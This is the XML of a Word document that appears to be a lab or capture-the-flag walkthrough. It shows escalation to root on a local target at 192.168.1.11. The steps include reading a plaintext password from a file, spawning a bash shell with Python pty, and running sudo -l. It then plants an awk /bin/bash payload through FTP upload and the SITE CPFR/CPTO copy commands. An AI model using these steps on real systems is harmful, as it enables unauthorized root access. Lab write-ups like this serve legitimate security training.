    </w:p>
    <w:p w14:paraId="5D27582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Cd ossec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB5C89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Then we get some secret file names patricksecretsofjoy lets see what’s inside it </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478F0948">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2728595" cy="3785870"/>
            <wp:effectExtent l="0" t="0" r="14605" b="889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8595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3C3B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3040F80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Cat patricksecretsofjoy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378206FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269865" cy="1214120"/>
            <wp:effectExtent l="0" t="0" r="3175" b="5080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A59F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EB8B08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get the password in plane texts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD2E7D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Now lets get the bash terminal here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52028BF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Python -c ‘import pty; pty.spawn(“/bin/bash”)’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15441FC2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B1F8872">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="561340"/>
            <wp:effectExtent l="0" t="0" r="635" b="2540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8B4C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="767C8FA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have just changed the user to patrick as we have the password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AA374C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D01C22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apollo098765</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCA3E37">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269230" cy="1021080"/>
            <wp:effectExtent l="0" t="0" r="3810" b="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DC3F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Sudo -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E8A69F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273040" cy="1261745"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175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6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AD950">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50F42492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Here we just get a exec filewhich do not require pass to run as root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C25C5B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can just replace this file lets make a new test file on our side then upload it to the server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5B008D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Echo “awk ‘BEGIN {system(\”/bin/bash\”)}’” &gt; test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFAF475">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273040" cy="470535"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905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9AFA4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="389A392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Just put the file on the server using ftp login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663959C9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53C50773">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273675" cy="2813685"/>
            <wp:effectExtent l="0" t="0" r="14605" b="5715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1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AFD1A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68F28F3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Now lets use the telnet service to upload it in partick directory and replace the test exec file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9DACD4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Telnet 192.168.1.11 21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A4B78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Site cpfr /home/ftp/upload/test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0692EDC5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Site cpto /home/patrick/script/test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B4E6C3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="2077085"/>
            <wp:effectExtent l="0" t="0" r="1905" b="10795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FC833">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="281E3B00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Lets run this file now</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8929A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="705485"/>
            <wp:effectExtent l="0" t="0" r="635" b="10795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69A03">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="360FEA6F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By running this we get the root privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D0AE72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1135" cy="1600200"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0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245DCE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="21245D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1C8D0CC"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="41C8D0CC"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="19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D86A5D"/>
    <w:rsid w:val="13EB60CF"/>
    <w:rsid w:val="19D70E3C"/>
    <w:rsid w:val="5B13207F"/>
    <w:rsid w:val="6DA16EAC"/>
    <w:rsid w:val="6E560129"/>
    <w:rsid w:val="79D86A5D"/>
    <w:rsid w:val="7C545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2025-01-16T11:16:00Z</dcterms:created>
  <dc:creator>yash yadav</dc:creator>
  <cp:lastModifiedBy>yash yadav</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-01-17T04:52:47Z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CC16FF5A2903433F9B1002BE0FE14737_11</vt:lpwstr>
  </property>
</Properties>
</file>